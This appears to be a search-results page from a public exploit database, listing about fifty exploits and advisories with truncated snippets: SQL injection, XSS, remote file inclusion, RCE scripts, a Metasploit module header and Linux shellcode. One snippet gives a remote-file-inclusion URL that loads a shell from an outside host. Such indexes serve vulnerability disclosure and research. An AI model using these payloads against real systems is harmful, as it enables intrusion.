39001 matches found
Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path Vulnerability
Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path Discovery by: Johto Robbie Tested Version: 2.52.13001.0 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 x64 Home Step to discover Unquoted Service Path: Go to Start and type cmd. Enter the following...
Webmin 1.973 - (run.cgi) Cross-Site Request Forgery Vulnerability
Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery CSRF Exploit Author: Mesh3l911 & Z0ldyck Vendor Homepage: https://www.webmin.com Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 Version: Webmin 1.973 Tested on: All versions POC By \0331;m \0331;37mMesh3l\0331;m \0331;36m...
EQDKP Plus CMS 2.3.29 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications ======================================================================= title: Reflected Cross-Site Scripting XSS Vulnerability product: EQDKP Plus CMS vulnerable version: = 2.3.29 fixed version: 2.3.30 CVE number: - impact: Low homepage:...
Neon LMS Shell Upload Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require "net/http" require "uri" require 'nokogiri' class MetasploitModule 'Neon LMS %q This module exploits File Manager File Upload vulnerability...
Apache Tomcat - AJP Ghostcat File Read/Inclusion Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python CNVD-2020-10487 Tomcat-Ajp lfi by ydhcui import struct Some references: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html def packstrings: if s is None: return struct.pack"h", -1 l = lens return...
V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation Vulnerability
Exploit for hardware platform in category web applications Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation Author: LiquidWorm Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd. Product web page: https://www.vsolcn.com Tested on: GoAhead-Webs Advisory ID:...
Netperf 2.6.0 - Stack-Based Buffer Overflow Exploit
Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking. It provides tests for both unidirectional troughput...
Argus Surveillance DVR 4.0.0.0 Directory Traversal Vulnerability
Exploit for cgi platform in category web applications + Credits: John Page aka hyp3rlinx + Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt + ISR: Apparition Security Greetz: Greetz: indoushka | Eduardo | GGA Vendor...
Squirrelcart <= 1.x.x (cart.php) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ==================================================================== Squirrelcart config.php, line 13 - $siteisproot = "blablabla"; Exploit : squirrelcart//popupwindow.php?siteisproot=http://example.com/shell.txt? notes : registerglobals =...
Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================== Limbo CMS = 1.0.4.2 sql.php Remote File Inclusion Vulnerability ================================================================== Title: Limbo CMS = 1.04 Remote File...
Teachers Record Management System 2.1 SQL Injection Vulnerability
Exploit Title: Teachers Record Management System v2.1 | Authenticated Time-Based SQLi Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un Vendor: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ Demo Site: https://phpgurukul.com/?sdmprocessdownload=1&downloadid=10739...
FileMage Gateway 1.10.9 - Local File Inclusion Exploit
Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion Exploit Author: Bryce "Raindayzz" Harty Vendor Homepage: https://www.filemage.io/ Version: Azure Versions 1.10.9 Tested on: All Azure deployments 1.10.9 CVE : CVE-2023-39026 Technical Blog -...
Webutler v3.2 - Remote Code Execution Exploit
Exploit Title: Webutler v3.2 - Remote Code Execution RCE Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutlerv3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technic...
WordPress adivaha Travel Plugin 2.3 - SQL Injection Vulnerability
Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection Exploit Author: CraCkEr Vendor: adivaha - Travel Tech Company Vendor Homepage: https://www.adivaha.com/ Software Link: https://wordpress.org/plugins/adiaha-hotel/ Demo: https://www.adivaha.com/demo/adivaha-online/ Version: 2.3...
Availability Booking Calendar v1.0 - Multiple Cross-site scripting Vulnerability
Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting XSS Exploit Author: Andrey Stoykov Tested on: Ubuntu 20.04 Blog: http://msecureltd.blogspot.com XSS 1: Steps to Reproduce: 1. Browse to Bookings 2. Select All Bookings 3. Edit booking and select Promo Code 4. Enter...
Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting Vulnerability
Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting XSS Exploit Author: tmrswrr Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: v15.0 POC: 1 Login in demo page , go to this url...
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Exploit
!/usr/bin/env python3 Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com...
FLEX 1080 < 1085 Web 1.6.0 - Denial of Service Exploit
Exploit Title: FLEX 1080 1085 Web 1.6.0 - Denial of Service Exploit Author: Mr Empy Vendor Homepage: https://www.tem.ind.br/ Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 Version: 1.6.0 Tested on: Android CVE ID: CVE-2022-2591 !/usr/bin/env python3 import requests import re impor...
MAC 1200R - Directory Traversal Vulnerability
Exploit Title: MAC 1200R - Directory Traversal Google Dork: "MAC1200R" && port="8888" Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd. Vendor Homepage: https://www.mercurycom.com.cn/ Software Link: https://www.mercurycom.com.cn/product-1-1.html Version: all versions. REQUIRED...
Hades RAT Web Panel Cross Site Scripting Vulnerability
Original source: https://malvuln.com/advisory/c4cc1317aea42f7dd4a1b786c5278a24C.txt Contact: email protected Media: twitter.com/malvuln Threat: Hades RAT - Web Panel Vulnerability: Remote Persistent XSS Family: Hades Type: WebUI MD5: c4cc1317aea42f7dd4a1b786c5278a24 MD5:...
Simple Real Estate Portal System 1.0 SQL Injection Vulnerability
Title: Simple Real Estate Portal System v1.0 remote SQL-Injections Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html Description: The id parameter appears to be...
Cmsimple 5.4 - Remote Code Execution (Authenticated) Exploit
Exploit Title: Cmsimple 5.4 - Remote Code Execution RCE Authenticated Exploit Author: pussycat0x Vendor Homepage: https://www.cmsimple.org/ Version: 5.4 Tested on: ubuntu-20.04.1 import argparse from bs4 import BeautifulSoup from argparse import ArgumentParser import requests parser=...
WordPress Popup 1.10.4 Plugin - Reflected Cross-Site Scripting Vulnerability
Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting XSS Author: 0xB9 Software Link: https://wordpress.org/plugins/popup-by-supsystic/ Version: 1.10.4 Tested on: Windows 10 CVE: CVE-2021-24275 1. Description: The plugin did not sanitize the tab parameter of its options pa...
ECOA Building Automation System Arbitrary File Deletion Vulnerability
ECOA building automation systems suffer from an arbitrary file deletion vulnerability. Many versions are affected. ECOA Building Automation System Arbitrary File Deletion Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS...
Ionic Identity Vault 4.7 Android Biometric Authentication Bypass Vulnerability
Ionic Identity Vault versions 4.7 and below suffer from a biometric authentication bypass vulnerability on Android. Product: Identity Vault Vendor: Ionic CVE ID: CVE-2021-3145 Subject: Biometric Authentication Bypass on Android Severity: Medium Effect: Authentication Bypass Introduction...
WordPress Survey & Poll 1.5.7.3 Plugin - (sss_params) SQL Injection Exploit (2)
Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sssparams' SQL Injection 2 Exploit Author: Mohin Paramasivam Shad0wQu35t Vendor Homepage: http://modalsurvey.pantherius.com/ Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip Version: 1.5.7.3 Tested on:...
Wordpress Appointment Booking Calendar 1.3.34 Plugin - CSV Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link:...
VMware WorkStation 12.5.5 - Virtual Machine Escape Exploit
VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.5 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 Known issues Failing to heap manipulation causes host process crash. Not quite elaborate because I'm not good at doing heap "fengshui" on winows...
Lavasoft 2.3.4.7 - (LavasoftTcpService) Unquoted Service Path Vulnerability
Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path Author: Luis MedinaL Vendor Homepage: https://www.adaware.com/ Software Link : https://www.adaware.com/antivirus Version : 2.3.4.7 Tested on: Microsoft Windows 10 Pro x64 ESP Description: Lavasoft 2.3.4.7 installs LavasoftTcpService as...
Paroiciel 11.20 - tRecIdListe SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Paroiciel 11.20 - 'tRecIdListe' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: https://www.paroiciel.com/ Software Link: https://datapacket.dl.sourceforge.net/project/paroiciel/version%2011/par6lus1120160225.exe...
SAP NetWeaver J2EE Engine 7.40 - SQL Injection Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python coding=utf-8 """ Author: Vahagn Vardanyan https://twitter.com/vah13 Bugs: CVE-2016-2386 SQL injection CVE-2016-2388 Information disclosure CVE-2016-1910 Crypto issue Follow HTTP request is a simple PoC for anon...
Microsoft Windows HTA (HTML Application) - Remote Code Execution Exploit
Microsoft Windows HTA HTML Application remote code execution exploit that leverages MS14-064. !/usr/bin/php poc'."\n\n"; $reza = socketcreateAFINET, SOCKSTREAM, 0 or die'Failed to create socket!'; socketbind$reza, 0,$port; socketlisten$...
EbizCare => SQL Injection Vulnerability
Exploit for php platform in category web applications =========================================================== + Exploit Title: EbizCare = SQL Injection Vulnerability + Date: March 05, 2012 + Author: dbx + Vendor or Software Link: http://www.ebizcare.com/ + Category: WebApps + Google dork:...
Zomplog 3.9 - Cross site scripting Vulnerability
Exploit Title: Zomplog 3.9 - Cross-site scripting XSS Application: Zomplog Version: v3.9 Bugs: XSS Technology: PHP Vendor URL: http://zomp.nl/zomplog/ Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip Date of found: 22.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2...
GZ Forum Script 1.8 - Stored Cross-Site Scripting Vulnerability
Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting XSS Exploit Author: CraCkEr Vendor: GZ Scripts Vendor Homepage: https://gzscripts.com/ Software Link: https://gzscripts.com/gz-forum-script.html Version: 1.8 Tested on: Windows 10 Pro Impact: Manipulate the content of the site Relea...
File Thingie 2.5.7 - Remote Code Execution Exploit
!/usr/bin/python Exploit Title: File Thingie 2.5.7 - Remote Code Execution RCE Google Dork: N/A Date: 27th of April, 2023 Exploit Author: Maurice Fielenbach grimlockx - Hexastrike Cybersecurity UG haftungsbeschränkt Software Link: https://github.com/leefish/filethingie Version: 2.5.7 Tested on: N...
Restaurant Management System 1.0 - SQL Injection Vulnerability
Exploit Title: Restaurant Management System 1.0 - SQL Injection Exploit Author: calfcrusher email protected Vendor Homepage: https://www.sourcecodester.com/users/lewa Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html Version: 1.0 Tested on: Apache 2.4.6, PH...
OpenSIS 8.0 - (cp_id_miss_attn) Reflected Cross-Site Scripting Vulnerability
Exploit Title: OpenSIS 8.0 - 'cpidmissattn' Reflected Cross-Site Scripting XSS Exploit Author: Eric Salario Vendor Homepage: http://www.os4ed.com/ Software Link: https://opensis.com/download Version: 8.0 Tested on: Windows, Linux CVE : CVE-2021-40310 OpenSIS Community Edition version 8.0 is...
Avian JVM 1.2.0 Silent Return Exploit
Avian JVM version 1.2.0 suffers from a silent return issue in the vm::arrayCopy method defined in classpath-common.h, where multiple boundary checks are performed to prevent out-of-bounds memory read/write. One of these boundary checks makes the code return silently when a negative length is...
Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass Author: LiquidWorm Vendor: Smartwares Product web page: https://www.smartwares.eu Affected version: =1.0.9 Advisory ID: ZSL-2019-5540 Advisory URL:...
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Exploit Name: Linux/x86 - execve/bin/sh socket reuse Shellcode 42 bytes Author : WangYihang Tested on: Linuxx86 Shellcode Length: 42 CVE: N/A ;================================================================================ Shellcode : char shellcode =...
Emerson Network Power Liebert Challenger 5.1E0.5 Cross Site Scripting Vulnerability
Exploit for multiple platform in category web applications I. VULNERABILITY ------------------------- httpGetSet/httpGet.htm on Emerson Network Power Liebert Challenger 5.1E0.5 devices allows XSS via the statusstr parameter. II. CVE REFERENCE ------------------------- CVE-2019-12167 III. VENDOR...
Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition
Exploit for windows platform in category local exploits Windows: LUAFV PostLuafvPostReadWrite SECTIONOBJECTPOINTERS Race Condition EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The LUA...
Data Center Audit 2.6.2 - username SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Data Center Audit 2.6.2 - 'username' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/ Software Link:...
Joomla JBcatalog Component - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla Component JBcatalog - Arbitrary File Upload Google Dork: inurl:/components/comjbcatalog/ Date: 16 December 2017 Indonesia Exploit Author: AlHikam0x Tested on: Ubuntu Proof of Concept 1. Check Vulnerability...
AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting Vulnerability
Exploit Title: Life Insurance Management Stored System- cross-site scripting XSS Exploit Author: Aslam Anwar Mahimkar Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEGON LIFE v1.0 Test...
Hubstaff 1.6.14-61e5e22e - (wow64log) DLL Search Order Hijacking Vulnerability
Exploit Title: Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking Exploit Author: Ahsan Azad Vendor Homepage: https://hubstaff.com/ Software Link: https://app.hubstaff.com/download Version: 1.6.13, 1.6.14 Tested On: 64-bit operating system, x64-based processor Description Hubstaff i...
Answerdev 1.0.3 - Account Takeover Exploit
Exploit Title: Answerdev 1.0.3 - Account Takeover Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp Vendor Homepage: https://answer.dev/ Software Link: https://github.com/answerdev/answer Version: 1.0.3 Tested on: Ubuntu 22.04 / Debian 11 CVE : CVE-2023-0744 from sys import argv import...
NetIQ Performance Endpoint v5.1 - remote root/SYSTEM Exploit
/ Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit Date: Jun 2007 Exploit Author: mu-b Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management Version: All Tested on: Windows / Solaris x86/SPARC CVE : 0day endpoint-pown-uni.c...
Human Resources Management System v1.0 - Multiple SQL injection Vulnerability
Exploit Title: Human Resources Management System v1.0 - Multiple SQLi Exploit Author: Abdulhakim Öner Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html Software...